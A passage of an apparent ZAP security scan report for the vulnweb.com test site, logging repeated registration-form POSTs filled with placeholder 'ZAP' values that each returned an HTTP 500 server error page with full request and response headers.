<h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D46 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D46 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D46 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:16 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D47 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D47 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D47 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:16 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D48 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D48 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D48 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:16 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D49 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D49 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D49 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:17 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 473 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:11 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D50 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D50 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D50 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:17 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D51 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D51 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D51 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:17 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D52 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D52 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D52 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:17 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D53 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D53 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D53 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:17 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D54 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D54 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D54 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:17 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D55 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D55 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D55 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:17 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D56 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D56 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D56 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:17 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D57 |
Method | POST |
Parameter | |
Attack | |
Evidence | HTTP/1.1 500 Internal Server Error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D57 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D57 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:18 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
